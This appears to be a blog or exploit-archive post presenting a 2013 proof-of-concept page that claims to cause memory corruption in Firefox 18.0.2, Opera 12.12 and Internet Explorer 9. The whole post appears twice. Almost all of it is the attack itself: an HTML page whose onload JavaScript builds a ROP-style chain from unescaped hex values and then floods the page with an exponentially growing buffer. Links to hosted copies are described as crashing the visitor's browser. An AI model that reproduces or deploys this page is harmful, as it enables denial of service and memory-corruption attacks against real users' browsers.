| Filename | Mozilla Firefox 18.0.2/ Opera 12.12 / Iexplorer 9 Memory Corruption |
| Permission | rw-r--r-- |
| Author | Unknown |
| Date and Time | 8:23 AM |
| Label | |
| Action |
# Title : Mozilla Firefox 18.0.2/ Opera 12.12 / Iexplorer 9 Memory Corruption
# Date: 2013-02-18
# Softwares Link:
http://www.mozilla.org
http://www.opera.com/
http://windows.microsoft.com/fr-CA/internet-explorer/
# Tested on: Windows XP SP2 & Puppy Linux & BackTrack 5
<html>
<head>
<title>Firefox 18.0.2 M3M0RY C0RRUPT!0N </title>
<body onload="javascript:hakim();">
<script language="JavaScript">
function hakim()
{
var rop =unescape("%ubcf1%u1000");
rop+=unescape("%uf5ef%u1000");
rop+=unescape("%u0000%u0000");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%uea03%u1001");
rop+=unescape("%u6f51%u1000");
rop+=unescape("%ubfc1%u1000");
rop+=unescape("%u0060%u1002");
rop+=unescape("%u0c50%u0c0c");
rop+=unescape("%uee6a%u1000");
rop+=unescape("%udda4%u1000");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u1ab4%u1000");
rop+=unescape("%u58c3%u1000");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%uf986%u1000");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u0070%u0041");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u0078%u0075");
rop+=unescape("%u006c%u002e");
rop+=unescape("%u0064%u006c");
rop+=unescape("%u006c%u0000");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%u3374%u00a6");
rop+=unescape("%u8acf%u1001");
rop+=unescape("%u8dd1%u1000");
rop+=unescape("%ue0b8%u1000");
rop+=unescape("%u3f14%u1001");
rop+=unescape("%ue0b8%u1000");
rop+=unescape("%u62d5%u1001");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%u9d12%u1001");
rop+=unescape("%uf5ef%u1000");
rop+=unescape("%u0001%u0000");
rop+=unescape("%u1000%u0000");
rop+=unescape("%u7e46%u1000");
rop+=unescape("%u0040%u0000");
rop+=unescape("%uaa6a%u1000");
rop+=unescape("%uaa03%u1001");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u58c3%u1000");
document.write(rop);
var buffer = '\x41\x45\xF2'
for(i=0; i <= 999 ; ++i)
{
buffer+=buffer+buffer
document.write(buffer);
}
}
</script>
</head>
</body>
</html>
// Proof of concept
http://5.53.78ae.static.theplanet.com/~amodio/Sans%20titre.GIF
if you click on that link your browser will crash
http://5.53.78ae.static.theplanet.com/~amodio/dz.html
-----------
# Date: 2013-02-18
# Softwares Link:
http://www.mozilla.org
http://www.opera.com/
http://windows.microsoft.com/fr-CA/internet-explorer/
# Tested on: Windows XP SP2 & Puppy Linux & BackTrack 5
<html>
<head>
<title>Firefox 18.0.2 M3M0RY C0RRUPT!0N </title>
<body onload="javascript:hakim();">
<script language="JavaScript">
function hakim()
{
var rop =unescape("%ubcf1%u1000");
rop+=unescape("%uf5ef%u1000");
rop+=unescape("%u0000%u0000");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%uea03%u1001");
rop+=unescape("%u6f51%u1000");
rop+=unescape("%ubfc1%u1000");
rop+=unescape("%u0060%u1002");
rop+=unescape("%u0c50%u0c0c");
rop+=unescape("%uee6a%u1000");
rop+=unescape("%udda4%u1000");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u1ab4%u1000");
rop+=unescape("%u58c3%u1000");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%uf986%u1000");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u0070%u0041");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u0078%u0075");
rop+=unescape("%u006c%u002e");
rop+=unescape("%u0064%u006c");
rop+=unescape("%u006c%u0000");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%u3374%u00a6");
rop+=unescape("%u8acf%u1001");
rop+=unescape("%u8dd1%u1000");
rop+=unescape("%ue0b8%u1000");
rop+=unescape("%u3f14%u1001");
rop+=unescape("%ue0b8%u1000");
rop+=unescape("%u62d5%u1001");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%u9d12%u1001");
rop+=unescape("%uf5ef%u1000");
rop+=unescape("%u0001%u0000");
rop+=unescape("%u1000%u0000");
rop+=unescape("%u7e46%u1000");
rop+=unescape("%u0040%u0000");
rop+=unescape("%uaa6a%u1000");
rop+=unescape("%uaa03%u1001");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u58c3%u1000");
document.write(rop);
var buffer = '\x41\x45\xF2'
for(i=0; i <= 999 ; ++i)
{
buffer+=buffer+buffer
document.write(buffer);
}
}
</script>
</head>
</body>
</html>
// Proof of concept
http://5.53.78ae.static.theplanet.com/~amodio/Sans%20titre.GIF
if you click on that link your browser will crash
http://5.53.78ae.static.theplanet.com/~amodio/dz.html
-----------
0 comments:
Post a Comment